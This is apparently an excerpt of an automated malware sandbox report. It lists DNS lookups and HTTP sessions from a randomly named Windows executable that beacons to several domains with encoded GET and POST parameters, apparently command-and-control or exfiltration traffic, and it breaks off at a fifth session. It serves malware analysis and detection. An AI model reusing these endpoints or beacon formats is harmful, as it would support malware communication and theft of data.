                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 26, 2024 15:22:24.954106092 CEST192.168.2.51.1.1.10x8dbeStandard query (0)www.2bhp.comA (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:22:40.724934101 CEST192.168.2.51.1.1.10xc4c4Standard query (0)www.ultraleap.netA (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:22:54.224633932 CEST192.168.2.51.1.1.10xb255Standard query (0)www.dalong.siteA (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:23:07.699139118 CEST192.168.2.51.1.1.10xad4Standard query (0)www.mgeducacaopro.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:23:21.990358114 CEST192.168.2.51.1.1.10xd468Standard query (0)www.heldhold.xyzA (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:23:36.552768946 CEST192.168.2.51.1.1.10x9b16Standard query (0)www.63582.photoA (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:24:11.272336960 CEST192.168.2.51.1.1.10xc5c8Standard query (0)www.useanecdotenow.techA (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:24:19.334300041 CEST192.168.2.51.1.1.10x3e04Standard query (0)www.asiapartnars.onlineA (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:24:32.505887032 CEST192.168.2.51.1.1.10x3eaeStandard query (0)www.linkwave.cloudA (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:24:45.664087057 CEST192.168.2.51.1.1.10xc9d0Standard query (0)www.mfgarage.netA (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:24:59.678277016 CEST192.168.2.51.1.1.10x5748Standard query (0)www.b5x7vk.agencyA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 26, 2024 15:22:25.016787052 CEST1.1.1.1192.168.2.50x8dbeNo error (0)www.2bhp.com81.88.63.46A (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:22:40.759285927 CEST1.1.1.1192.168.2.50xc4c4No error (0)www.ultraleap.netwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 15:22:40.759285927 CEST1.1.1.1192.168.2.50xc4c4No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:22:54.491645098 CEST1.1.1.1192.168.2.50xb255No error (0)www.dalong.sitedalong.siteCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 15:22:54.491645098 CEST1.1.1.1192.168.2.50xb255No error (0)dalong.site172.96.187.60A (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:23:07.712119102 CEST1.1.1.1192.168.2.50xad4No error (0)www.mgeducacaopro.onlinemgeducacaopro.onlineCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 15:23:07.712119102 CEST1.1.1.1192.168.2.50xad4No error (0)mgeducacaopro.online3.33.130.190A (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:23:07.712119102 CEST1.1.1.1192.168.2.50xad4No error (0)mgeducacaopro.online15.197.148.33A (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:23:22.109816074 CEST1.1.1.1192.168.2.50xd468No error (0)www.heldhold.xyz67.223.117.189A (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:23:37.089288950 CEST1.1.1.1192.168.2.50x9b16No error (0)www.63582.photo6ybpt9er.as66588.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 15:23:37.089288950 CEST1.1.1.1192.168.2.50x9b16No error (0)6ybpt9er.as66588.comazkwupgf.as66588.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 15:23:37.089288950 CEST1.1.1.1192.168.2.50x9b16No error (0)azkwupgf.as66588.com103.248.137.209A (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:24:11.280822992 CEST1.1.1.1192.168.2.50xc5c8Name error (3)www.useanecdotenow.technonenoneA (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:24:19.360846043 CEST1.1.1.1192.168.2.50x3e04No error (0)www.asiapartnars.onlineasiapartnars.onlineCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 15:24:19.360846043 CEST1.1.1.1192.168.2.50x3e04No error (0)asiapartnars.online3.33.130.190A (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:24:19.360846043 CEST1.1.1.1192.168.2.50x3e04No error (0)asiapartnars.online15.197.148.33A (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:24:32.532193899 CEST1.1.1.1192.168.2.50x3eaeNo error (0)www.linkwave.cloudlinkwave.cloudCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 15:24:32.532193899 CEST1.1.1.1192.168.2.50x3eaeNo error (0)linkwave.cloud3.33.130.190A (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:24:32.532193899 CEST1.1.1.1192.168.2.50x3eaeNo error (0)linkwave.cloud15.197.148.33A (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:24:45.893224955 CEST1.1.1.1192.168.2.50xc9d0No error (0)www.mfgarage.net85.153.138.113A (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:24:59.815284014 CEST1.1.1.1192.168.2.50x5748No error (0)www.b5x7vk.agency172.67.165.25A (IP address)IN (0x0001)false
                                              Sep 26, 2024 15:24:59.815284014 CEST1.1.1.1192.168.2.50x5748No error (0)www.b5x7vk.agency104.21.11.31A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.2bhp.com
                                              • www.ultraleap.net
                                              • www.dalong.site
                                              • www.mgeducacaopro.online
                                              • www.heldhold.xyz
                                              • www.63582.photo
                                              • www.asiapartnars.online
                                              • www.linkwave.cloud
                                              • www.mfgarage.net
                                              • www.b5x7vk.agency

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.54970981.88.63.46802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:22:25.040668964 CEST519OUTGET /a4ar/?vf5pwn=bigEPZ6XMKFUrjbkOOF/tc1QSeZpy4rj9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOCaAaQ3Lxux4SSFbsDgkYjgjAaiC5myZdzdYIguvdh1gvDg==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.2bhp.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 26, 2024 15:22:25.683492899 CEST367INHTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:22:25 GMT
                                              Server: Apache
                                              Content-Length: 203
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 34 61 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.549710217.70.184.50802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:22:40.778537035 CEST772OUTPOST /8pln/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.ultraleap.net
                                              Origin: http://www.ultraleap.net
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.ultraleap.net/8pln/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 34 36 70 41 31 52 66 4e 51 72 73 6b 61 4b 4d 33 35 76 51 7a 47 57 52 74 63 31 66 38 33 30 62 31 4a 32 38 54 46 74 63 79 2b 44 4e 50 4c 41 73 55 63 6f 4e 74 50 70 6e 76 58 68 6d 33 72 38 48 6b 4b 75 77 70 76 39 69 48 6f 37 6a 45 77 70 42 4e 61 49 78 51 76 36 4f 4b 59 53 36 7a 5a 32 50 51 61 72 4d 72 4d 43 34 36 48 6b 76 6b 49 63 47 36 46 6e 6e 43 68 55 32 55 4c 69 43 57 57 52 4a 79 36 78 45 50 35 46 42 39 4b 76 44 46 72 55 6d 70 2b 51 72 33 6a 4d 66 38 65 42 46 34 4c 75 4c 65 52 6b 6f 73 31 75 4a 4b 65 37 72 63 49 42 2f 4e 63 6e 4d 55 43 79 56 65 59 41 73 3d
                                              Data Ascii: vf5pwn=e/XjuvFYh54w46pA1RfNQrskaKM35vQzGWRtc1f830b1J28TFtcy+DNPLAsUcoNtPpnvXhm3r8HkKuwpv9iHo7jEwpBNaIxQv6OKYS6zZ2PQarMrMC46HkvkIcG6FnnChU2ULiCWWRJy6xEP5FB9KvDFrUmp+Qr3jMf8eBF4LuLeRkos1uJKe7rcIB/NcnMUCyVeYAs=
                                              Sep 26, 2024 15:22:41.397710085 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Thu, 26 Sep 2024 13:22:41 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.549711217.70.184.50802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:22:43.321964979 CEST792OUTPOST /8pln/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.ultraleap.net
                                              Origin: http://www.ultraleap.net
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.ultraleap.net/8pln/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 69 5a 68 41 7a 78 6a 4e 52 4c 73 6a 51 71 4d 33 79 50 51 76 47 57 56 74 63 30 72 57 33 48 2f 31 49 55 6b 54 45 73 63 79 35 44 4e 50 41 67 73 49 54 49 4d 68 50 70 71 51 58 67 61 33 72 34 76 6b 4b 75 67 70 76 4f 36 45 36 62 6a 47 34 4a 42 4c 48 34 78 51 76 36 4f 4b 59 53 75 4e 5a 32 58 51 61 61 38 72 4d 6d 73 35 4f 45 76 6e 65 73 47 36 50 33 6e 65 68 55 33 48 4c 6e 69 73 57 54 42 79 36 78 55 50 34 55 42 2b 5a 50 44 4c 6c 30 6e 43 7a 67 2f 36 76 4b 4c 39 65 52 51 52 5a 66 4c 42 51 53 46 47 76 4d 42 69 4e 62 48 6b 59 53 33 36 4e 58 74 39 59 52 46 75 47 58 34 47 4f 75 48 58 51 59 2b 4a 61 56 6e 2b 74 46 63 54 33 50 73 54
                                              Data Ascii: vf5pwn=e/XjuvFYh54wiZhAzxjNRLsjQqM3yPQvGWVtc0rW3H/1IUkTEscy5DNPAgsITIMhPpqQXga3r4vkKugpvO6E6bjG4JBLH4xQv6OKYSuNZ2XQaa8rMms5OEvnesG6P3nehU3HLnisWTBy6xUP4UB+ZPDLl0nCzg/6vKL9eRQRZfLBQSFGvMBiNbHkYS36NXt9YRFuGX4GOuHXQY+JaVn+tFcT3PsT
                                              Sep 26, 2024 15:22:43.918278933 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Thu, 26 Sep 2024 13:22:43 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.549712217.70.184.50802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:22:45.866069078 CEST1809OUTPOST /8pln/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.ultraleap.net
                                              Origin: http://www.ultraleap.net
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.ultraleap.net/8pln/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 69 5a 68 41 7a 78 6a 4e 52 4c 73 6a 51 71 4d 33 79 50 51 76 47 57 56 74 63 30 72 57 33 48 33 31 49 68 77 54 46 4c 41 79 34 44 4e 50 44 67 73 4c 54 49 4d 6f 50 70 79 55 58 67 57 42 72 2b 72 6b 49 4d 59 70 70 2f 36 45 78 62 6a 47 30 70 42 4f 61 49 78 42 76 2b 71 56 59 53 2b 4e 5a 32 58 51 61 59 6b 72 62 69 34 35 43 6b 76 6b 49 63 47 2b 46 6e 6e 36 68 55 76 58 4c 6e 75 38 57 69 68 79 37 51 6b 50 30 47 5a 2b 61 76 44 4a 6d 30 6e 61 7a 67 69 36 76 4f 72 4c 65 53 4e 38 5a 59 2f 42 51 55 73 51 35 4d 38 2b 62 4b 66 70 63 7a 50 76 4e 43 46 6b 58 33 52 75 44 45 45 54 4f 62 2f 50 47 4e 7a 46 4d 31 65 79 76 42 73 33 79 49 30 62 67 78 4f 50 76 59 4d 72 50 6c 31 32 6b 78 34 61 77 4a 43 33 51 78 41 38 61 43 41 50 52 4e 48 49 36 6c 39 76 54 38 79 6b 38 75 33 51 30 57 58 59 72 70 70 5a 2f 59 4f 47 63 30 55 50 31 2f 74 48 62 69 44 50 41 46 70 47 70 38 78 4c 48 47 5a 4b 49 74 78 48 77 59 41 6d 4f 65 38 53 35 78 47 4c 48 4c 71 70 74 36 74 33 78 7a 45 4a 64 46 46 [TRUNCATED]
                                              Data Ascii: vf5pwn=e/XjuvFYh54wiZhAzxjNRLsjQqM3yPQvGWVtc0rW3H31IhwTFLAy4DNPDgsLTIMoPpyUXgWBr+rkIMYpp/6ExbjG0pBOaIxBv+qVYS+NZ2XQaYkrbi45CkvkIcG+Fnn6hUvXLnu8Wihy7QkP0GZ+avDJm0nazgi6vOrLeSN8ZY/BQUsQ5M8+bKfpczPvNCFkX3RuDEETOb/PGNzFM1eyvBs3yI0bgxOPvYMrPl12kx4awJC3QxA8aCAPRNHI6l9vT8yk8u3Q0WXYrppZ/YOGc0UP1/tHbiDPAFpGp8xLHGZKItxHwYAmOe8S5xGLHLqpt6t3xzEJdFFmSVzpQG7Xo18Iz80o66/oZx1kR+aUoHWetFGWDJMF3iD5u8UUxJjeCzzDeEgI5V/pTQx7ySVCGNVzd4AF+WgqWxXmP/YVKtbmWPZvX7V4UMDSTa8B3gUF57siTWabbJenvt+Qrwi6L/9y3isJCzhj1SsB652ryxbhK9meW3SYedlbcpnhbvzNC7yaXc2u8PfLb8wQ4Gy+6zKxXsuvar8akgmuTgPzNQhqhJYcTRlS8eZlziuzZzx8EdD8LhatvpNR2So3wcjOe5MPCs4Wslursi0T3oHjAGtTzm9re32QP8kPWtt5nbzuGva4xIKnU8SXa+Ar7VX3NxxHZcPis5vW8/pSzbM8NKqWI4Y6Q9frFxhMJq7ssTw8lCbHNlwuOmsf4+kvHhvcVcCl249AU0LY/YDteUQKOrfmKpiBKV/BGocXlUNJG9Aw0IuhtvDqRqr9iCPxiuxi9Vuo2zAd7jeQfDj/xNcLaxAQHsFDstbRd0L8bIIfAckyCcD15T+qxNMXAYiyJ9UzaUNIbxVHyM0c8szBywzfHSYh4D4ckQit/TSpPi1h54l4WlpeCLaGfVlnzI7poAoMe4UkF5abz5ri9B+bUu8wn0NIIhf9e8c1gUltlK2Lc16Df9NyVKSDF4HlKjtDUJZktUIDyjfjZWT2xqxoq+BoCwWry [TRUNCATED]
                                              Sep 26, 2024 15:22:46.509876013 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Thu, 26 Sep 2024 13:22:46 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.549713217.70.184.50802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:22:48.595016956 CEST524OUTGET /8pln/?vf5pwn=T9/DtY4QstE2hf5N+QbDCp08BY0+/KIvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9qM2494p5Ur94ranWdRPLWWfdK4ZvNUpqMUToNubzG0SM8g==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.ultraleap.net
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 26, 2024 15:22:49.195121050 CEST1236INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Thu, 26 Sep 2024 13:22:49 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Language
                                              Data Raw: 37 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 75 6c 74 72 61 6c 65 61 70 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 [TRUNCATED]
                                              Data Ascii: 785<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>ultraleap.net</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://wh [TRUNCATED]
                                              Sep 26, 2024 15:22:49.195178032 CEST890INData Raw: 72 61 6c 65 61 70 2e 6e 65 74 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 75 6c 74 72 61 6c 65 61 70 2e 6e 65 74 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68
                                              Data Ascii: raleap.net"><strong>View the WHOIS results of ultraleap.net</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_202


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.549714172.96.187.60802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
